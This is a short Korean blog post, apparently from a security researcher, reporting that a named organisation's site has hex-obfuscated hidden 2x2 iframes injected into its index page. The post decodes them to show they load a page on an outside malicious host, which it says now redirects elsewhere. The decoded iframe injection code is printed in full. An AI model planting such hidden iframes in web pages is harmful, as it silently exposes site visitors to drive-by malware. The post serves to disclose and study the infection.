감염 사이트 : http://www.jeonju1318.or.kr
* 위 사이트는 현재도 감염중에 있습니다!
http://www.jeonju1318.or.kr/root/index.php
안에 현재 악성 스크립트가 존재하여서 글을 써 봅니다!
현재 감염된 페이니 내에 ! 이렇게 Hex 코드로 위장하여 Iframe이 삽입되었습니다!
src=http://apple.chol.(중략);l width=2 height=2></iframe><iframe src=http://apple.chol.c (중략) ; width=2 height=2></iframe><iframe src=http://apple.chol.co (중략) ; width=2 height=2></iframe><iframe src=http://apple.&#x
63;hol.co (중략) C; width=2
간단하게 Docode Hex 를 해주면 제대로 된 Iframe 를 보실 수 있습니다!
http://apple.chox.com/xml/index.html width=2 height=2></iframe>
<iframe src=http://apple.chox.com/xml/index.html width=2 height=2></iframe>
<iframe src=http://apple.chox.com/xml/index.html width=2 height=2></iframe>
<iframe src=http://apple.chox.com/xml/index.html
현재 페이지는 사라졌으며! 다시 페이지가 http://www.test.ccc Redirection 되고 있습니다!
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.test.ccc">here</a>.</p>
</body></html>
http://www.test.ccc
=========================
Server IP(s):
0.0.0.0
=========================
'security > 악성코드 유포' 카테고리의 다른 글
| inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 ! (0) | 2012.06.29 |
|---|---|
| 오랜만에 풀어본 난독화 스크립트! (0) | 2012.06.29 |
| 악성 스크립트 새로운 암호화 방식 ?? (5) | 2012.02.26 |
| http://ad.nsonmedia.com 내의 악성 스크립트 삽입 ! (0) | 2012.02.25 |
| clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 포함된 Script (3) | 2012.02.10 |